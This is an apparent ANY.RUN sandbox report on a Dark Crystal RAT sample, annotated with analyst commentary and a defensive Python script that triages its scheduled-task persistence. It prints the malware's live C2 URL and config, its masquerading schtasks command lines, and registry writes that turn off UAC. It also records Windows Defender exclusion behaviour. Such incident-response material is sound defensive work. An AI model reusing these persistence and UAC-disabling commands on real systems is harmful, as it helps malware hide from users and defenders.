File name: bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6

Full analysis: https://app.any.run/tasks/da8650e8-32f8-4e1e-9283-b9bfb626ba47
Verdict: Malicious activity
Threats:

DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common.

Analysis date: May 24, 2024, 22:06:29
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
rat
dcrat
remote
darkcrystal
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5: D1BFFB7DFD0CCFE6AA48313B65C2EB11
SHA1: 5D2EA43954CA796AB1B9C8852E89AA34188C045B
SHA256: BC65E00E7CFB6F9DE5C996B3D60DFF8012DB0217A5AFD288DC1F29C53EB76DA6
SSDEEP: 98304:PdBQLtVbRMwj60PNahlEzEJ8pyd8phwDx5Z6xaLlJEQf:n

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6308)
      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • dasHost.exe (PID: 7260)
    • UAC/LUA settings modification

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)
    • Adds path to the Windows Defender exclusion list

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 8012)
      • wscript.exe (PID: 7988)
      • wscript.exe (PID: 7348)
      • wscript.exe (PID: 3640)
      • wscript.exe (PID: 7456)
      • wscript.exe (PID: 6932)
      • wscript.exe (PID: 7512)
      • wscript.exe (PID: 8172)
      • wscript.exe (PID: 6420)
      • wscript.exe (PID: 7292)
      • wscript.exe (PID: 6448)
      • wscript.exe (PID: 3732)
      • wscript.exe (PID: 7460)
      • wscript.exe (PID: 8068)
      • wscript.exe (PID: 7748)
      • wscript.exe (PID: 6660)
    • Deletes a file (SCRIPT)

      • wscript.exe (PID: 7988)
      • wscript.exe (PID: 7348)
      • wscript.exe (PID: 6932)
      • wscript.exe (PID: 7512)
      • wscript.exe (PID: 6420)
      • wscript.exe (PID: 3732)
      • wscript.exe (PID: 7460)
    • DARKCRYSTAL has been detected (SURICATA)

      • dasHost.exe (PID: 7260)
    • DCRAT has been detected (YARA)

      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6308)
      • ShellExperienceHost.exe (PID: 6684)
      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)
    • Reads the date of Windows installation

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6308)
      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)
    • Starts CMD.EXE for commands execution

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6308)
    • The process creates files with name similar to system file names

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
    • Executed via WMI

      • schtasks.exe (PID: 6876)
      • schtasks.exe (PID: 6916)
      • schtasks.exe (PID: 6112)
      • schtasks.exe (PID: 7004)
      • schtasks.exe (PID: 6980)
      • schtasks.exe (PID: 4936)
      • schtasks.exe (PID: 4952)
      • schtasks.exe (PID: 3608)
      • schtasks.exe (PID: 2736)
      • schtasks.exe (PID: 4996)
      • schtasks.exe (PID: 4416)
      • schtasks.exe (PID: 72)
      • schtasks.exe (PID: 4140)
      • schtasks.exe (PID: 2592)
      • schtasks.exe (PID: 6944)
      • schtasks.exe (PID: 3624)
      • schtasks.exe (PID: 5536)
      • schtasks.exe (PID: 636)
      • schtasks.exe (PID: 5932)
      • schtasks.exe (PID: 6156)
      • schtasks.exe (PID: 2332)
    • Likely accesses (executes) a file from the Public directory

      • schtasks.exe (PID: 4936)
    • Executable content was dropped or overwritten

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • dasHost.exe (PID: 7260)
    • Starts POWERSHELL.EXE for commands execution

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
    • Script adds exclusion path to Windows Defender

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
    • Creates file in the systems drive root

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
    • The process executes VB scripts

      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 7988)
      • wscript.exe (PID: 8012)
      • wscript.exe (PID: 7348)
      • wscript.exe (PID: 3640)
      • wscript.exe (PID: 7456)
      • wscript.exe (PID: 6932)
      • wscript.exe (PID: 8172)
      • wscript.exe (PID: 7512)
      • wscript.exe (PID: 6420)
      • wscript.exe (PID: 7292)
      • wscript.exe (PID: 3732)
      • wscript.exe (PID: 6448)
      • wscript.exe (PID: 7460)
      • wscript.exe (PID: 8068)
      • wscript.exe (PID: 6660)
      • wscript.exe (PID: 7748)
    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • wscript.exe (PID: 7988)
      • wscript.exe (PID: 7348)
      • wscript.exe (PID: 6932)
      • wscript.exe (PID: 7512)
      • wscript.exe (PID: 6420)
      • wscript.exe (PID: 3732)
      • wscript.exe (PID: 7460)
      • wscript.exe (PID: 6660)
    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 7988)
      • wscript.exe (PID: 7348)
      • wscript.exe (PID: 6932)
      • wscript.exe (PID: 7512)
      • wscript.exe (PID: 6420)
      • wscript.exe (PID: 3732)
      • wscript.exe (PID: 7460)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7988)
      • wscript.exe (PID: 7348)
      • wscript.exe (PID: 6932)
      • wscript.exe (PID: 7512)
      • wscript.exe (PID: 6420)
      • wscript.exe (PID: 3732)
      • wscript.exe (PID: 7460)
  • INFO

    • Reads the computer name

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6308)
      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • ShellExperienceHost.exe (PID: 6684)
      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)
    • Checks supported languages

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6308)
      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • ShellExperienceHost.exe (PID: 6684)
      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)
    • Process checks computer location settings

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6308)
      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)
    • Reads Environment values

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6308)
      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)
    • Reads the machine GUID from the registry

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6308)
      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)
    • Process checks whether UAC notifications are on

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)
    • Create files in a temporary directory

      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)
    • Reads Microsoft Office registry keys

      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7072)
      • powershell.exe (PID: 7060)
      • powershell.exe (PID: 6880)
      • powershell.exe (PID: 7048)
      • powershell.exe (PID: 6944)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 6592)
      • powershell.exe (PID: 6620)
      • powershell.exe (PID: 6584)
      • powershell.exe (PID: 6920)
      • powershell.exe (PID: 7028)
      • powershell.exe (PID: 6876)
      • powershell.exe (PID: 7004)
    • Checks proxy server information

      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)
    • Disables trace logs

      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

DcRat

(PID) Process: (308) dasHost.exe
C2 (1): http://a0949311.xsph.ru/_Defaultwindows
Options:
  Tag: F
  Mutex: adw-Kfpdv2jonhNaGxe7D96L
  searchpath: %UsersFolder% - Fast
  Target: als
  Debug: false
ServerConfigReplacementTable (character pairs as extracted by the config parser; the partner of the "2" entry is not visible in the extracted report):
  0 -
  2
  6 ^
  E !
  k ;
  a #
  j %
  c $
  O >
  w .
  F (
  i &
  y `
  R ,
  H ~
  I <
  M *
  L @
  p |
  A )
  V _
PluginConfigReplacementTable (the partner of the "q" entry is likewise not visible):
  1 _
  2 |
  U )
  V @
  b !
  G %
  r -
  Q (
  T ~
  S ;
  J *
  q
  B ,
  W #
  c <
  Z ^
  i `
  d >
  h &
  N $
  F .
GetWebcams: false
SleepTimeout: 5
InactivityTimeout: 2
CacheStorage: Registry
AutoRun: Smart
StealerConfig:
  searchpath: %UsersFolder% - Fast
  StealerEnabled: false
  StealerOptions: false
SelfDelete: false

(PID) Process: (324) dasHost.exe
Configuration identical to PID 308 (same C2, Tag, Mutex, replacement tables and options), as expected for two copies of the same build running side by side.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (45.1)
.exe | Win32 Executable MS Visual C++ (generic) (19.2)
.exe | Win64 Executable (generic) (17)
.scr | Windows screen saver (8)
.dll | Win32 Dynamic Link Library (generic) (4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2022:05:04 16:03:35+00:00
ImageFileCharacteristics: Executable, No line numbers, No symbols, Large address aware, 32-bit
PEType: PE32
LinkerVersion: 6
CodeSize: 1951744
InitializedDataSize: 13824
UninitializedDataSize: -
EntryPoint: 0x1de6de
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 774.479.801.351
ProductVersionNumber: 166.535.459.901
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Dynamic link library
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
ProductName: L3Wl9txpfPeE7pTZeDBnEJd0ARder
CompanyName: 9fEIdVaVzhSWJ4KUn4r6
InternalName: rwF4CQulk1SF7PmAm68mH.exe
LegalCopyright: VulAlhhrl8i
Comments: uM8OaEDfBn9QLgVU97yGaIFpMBo1
OriginalFileName: OIT.exe
ProductVersion: 166.535.459.901
FileVersion: 774.479.801.351

The version resource is generated noise: the product, company, copyright and comment strings are random letter sequences, the version numbers are implausible, and ObjectFileType declares a DLL although the PE header describes a GUI executable. None of these strings is usable as an indicator; the hashes, the mutex and the C2 host are.
Total processes
195
Monitored processes
76
Malicious processes
19
Suspicious processes
8

Behavior graph

Process chain as laid out in the graph ("no specs" marks processes without signature hits of their own):
  • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (no specs) → cmd.exe → conhost.exe (no specs)
  • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (second instance) → shellexperiencehost.exe (no specs)
  • 21 × schtasks.exe (no specs)
  • 13 × powershell.exe (no specs) with 13 × conhost.exe (no specs)
  • 8 × dashost.exe, each followed by 2 × wscript.exe (no specs); the graph tags the first dashost.exe #DARKCRYSTAL and the sixth and seventh #DCRAT. The process table below shows wscript.exe as the parent of each dasHost.exe entry it lists (PIDs 308, 324, 2304), so the dasHost.exe / wscript.exe pairs form a relaunch chain rather than eight independent starts.

Process information

The entries below are the subset of the 76 monitored processes that the report shows, flattened here as PID | CMD | Path | Parent process (the Indicators column is empty for all of them). Two points stand out: every schtasks.exe instance has WmiPrvSE.exe as its parent, so the tasks were registered through WMI rather than from the dropper's own command line, and every task name and target file name imitates a Windows binary (wininit, csrss, RuntimeBroker, RUXIMICS) while the target sits where that binary does not belong: a user profile, C:\Windows\addins, or the chkdsk recovery directory C:\found.000. The conhost.exe entries are the console hosts of the powershell.exe instances.
PID 72 | CMD: schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\admin\wininit.exe'" /rl HIGHEST /f | Path: C:\Windows\System32\schtasks.exe | Parent: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 308 | CMD: C:\found.000\dir_00000002.chk\dasHost.exe | Path: C:\found.000\dir_00000002.chk\dasHost.exe | Parent: wscript.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\found.000\dir_00000002.chk\dashost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
PID 324 | CMD: C:\found.000\dir_00000002.chk\dasHost.exe | Path: C:\found.000\dir_00000002.chk\dasHost.exe | Parent: wscript.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\found.000\dir_00000002.chk\dashost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
PID 608 | CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | Path: C:\Windows\System32\conhost.exe | Parent: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 636 | CMD: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\found.000\dir0001.chk\csrss.exe'" /rl HIGHEST /f | Path: C:\Windows\System32\schtasks.exe | Parent: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 1116 | CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | Path: C:\Windows\System32\conhost.exe | Parent: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 2304 | CMD: C:\found.000\dir_00000002.chk\dasHost.exe | Path: C:\found.000\dir_00000002.chk\dasHost.exe | Parent: wscript.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\found.000\dir_00000002.chk\dashost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
PID 2332 | CMD: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\found.000\dir0001.chk\csrss.exe'" /rl HIGHEST /f | Path: C:\Windows\System32\schtasks.exe | Parent: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 2592 | CMD: schtasks.exe /create /tn "RUXIMICSR" /sc MINUTE /mo 10 /tr "'C:\Windows\addins\RUXIMICS.exe'" /f | Path: C:\Windows\System32\schtasks.exe | Parent: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 2736 | CMD: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\admin\RuntimeBroker.exe'" /rl HIGHEST /f | Path: C:\Windows\System32\schtasks.exe | Parent: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
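The scheduled-task command lines above are the part of this report a responder would turn into a hunt across other hosts. The script below is an added example, not code from the ANY.RUN report or from DCRat: it parses the five schtasks.exe command lines exactly as recorded (the same parsing applies to command lines exported from Sysmon event 1 or an EDR), and flags what makes them persistence rather than housekeeping. The allow-list of System32 binary names and the directory patterns treated as suspicious are assumptions chosen for illustration; a real allow-list would be generated from a known-good image.

```python
"""Triage of the schtasks.exe persistence commands recorded in this report.

Added example; not code from the ANY.RUN report or from DCRat. The five
command lines are copied from the process table. SYSTEM32_NAMES and the
directory patterns below are assumptions for illustration.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Command lines exactly as recorded (every one had WmiPrvSE.exe as parent).
SCHTASKS_CMDLINES = [
    r'''schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\admin\wininit.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\found.000\dir0001.chk\csrss.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\found.000\dir0001.chk\csrss.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "RUXIMICSR" /sc MINUTE /mo 10 /tr "'C:\Windows\addins\RUXIMICS.exe'" /f''',
    r'''schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\admin\RuntimeBroker.exe'" /rl HIGHEST /f''',
]

# Assumption: names of binaries that belong in %SystemRoot%\System32 on a
# clean host. Generate this from a known-good image in real use.
SYSTEM32_NAMES = {"csrss.exe", "wininit.exe", "runtimebroker.exe", "dashost.exe",
                  "smss.exe", "lsass.exe", "svchost.exe", "systemsettings.exe"}
SYSTEM32_DIR = "c:\\windows\\system32\\"


@dataclass
class TaskFacts:
    name: str
    schedule: str            # value of /sc, upper-cased
    modifier: Optional[int]  # value of /mo, if present
    target: str              # program started by the task (/tr)
    highest: bool            # /rl HIGHEST present
    flags: List[str] = field(default_factory=list)


def parse_schtasks(cmd: str) -> TaskFacts:
    """Extract the fields of a 'schtasks /create' command line."""
    def opt(pattern: str) -> Optional[str]:
        m = re.search(pattern, cmd, re.IGNORECASE)
        return m.group(1) if m else None

    name, sched, target = opt(r'/tn\s+"([^"]+)"'), opt(r'/sc\s+(\S+)'), opt(r'/tr\s+"([^"]+)"')
    if not (name and sched and target):
        raise ValueError(f"not a schtasks /create line: {cmd!r}")
    mo = opt(r'/mo\s+(\d+)')
    return TaskFacts(
        name=name,
        schedule=sched.upper(),
        modifier=int(mo) if mo else None,
        target=target.strip("'"),   # the report wraps the path as "'...'"
        highest=re.search(r'/rl\s+HIGHEST', cmd, re.IGNORECASE) is not None,
    )


def assess(task: TaskFacts) -> TaskFacts:
    """Attach the observations a responder would act on."""
    path = task.target.lower()
    directory, _, basename = path.rpartition("\\")
    directory += "\\"
    if basename in SYSTEM32_NAMES and directory != SYSTEM32_DIR:
        task.flags.append(f"masquerade: {basename} outside System32")
    if re.search(r"\\found\.\d{3}\\", path):
        task.flags.append("target under chkdsk recovery folder")
    if path.startswith("c:\\users\\"):
        task.flags.append("target in a user profile")
    if task.highest:
        task.flags.append("/rl HIGHEST (runs with the user's highest privileges)")
    if task.schedule == "MINUTE":
        task.flags.append(f"re-launched every {task.modifier} min")
    elif task.schedule == "ONLOGON":
        task.flags.append("re-launched at every logon")
    return task


def triage(cmdlines: List[str]) -> List[TaskFacts]:
    return [assess(parse_schtasks(c)) for c in cmdlines]


if __name__ == "__main__":
    for t in triage(SCHTASKS_CMDLINES):
        print(f"{t.name:15} {t.schedule:8} -> {t.target}")
        for f in t.flags:
            print("    -", f)
```

Run against the five recorded lines, the csrss and RuntimeBroker tasks are flagged both as masquerades and for their locations, the RUXIMICSR task is the only one registered without /rl HIGHEST, and the minute-interval tasks show why killing the running dasHost.exe alone does not end the infection: the task re-launches the copy within minutes.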
Total events
135 769
Read events
135 614
Write events
155
Delete events
0

Modification events

(PID) Process: (6308) bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
  write ProxyBypass = 1
  write IntranetName = 1
  write UNCAsIntranet = 1
  write AutoDetect = 0
Zone-map values commonly touched when a .NET application initialises its proxy settings; ANY.RUN reports them as "Reads security settings of Internet Explorer" and they are not, on their own, an indicator.

(PID) Process: (6520) bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
  write EnableLUA = 0
  write ConsentPromptBehaviorAdmin = 0
  write PromptOnSecureDesktop = 0
These three writes are the "UAC/LUA settings modification" signature. EnableLUA=0 turns User Account Control off at the next logon; until then, ConsentPromptBehaviorAdmin=0 with PromptOnSecureDesktop=0 makes elevation for administrators silent and without the secure desktop. Writing under this HKLM key already requires administrative rights, so the second dropper instance was elevated at this point.

(PID) Process: (6520) bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0
  write CheckSetting = 23004100430042006C006F00620000000000000000000000010000000000000000000000
The value is a UTF-16LE blob beginning with the string "#ACBlob". This is the Security and Maintenance (Action Center) check record that ANY.RUN ties to the "Process checks whether UAC notifications are on" signature; rewriting it keeps the user from being prompted about the UAC change just made.

(PID) Process: (6684) ShellExperienceHost.exe
Key: \REGISTRY\A\{70cc3777-706b-aa22-e810-b2bbcfafda65}\LocalState
  write PeekBadges = 5B005D00000085E275AA26AEDA01
  write PeekBadges = 5B005D0000004C3378AA26AEDA01
Taskbar badge state written by the shell itself; not attributable to the sample.
Executable files
32
Suspicious files
1
Text files
52
Unknown types
0

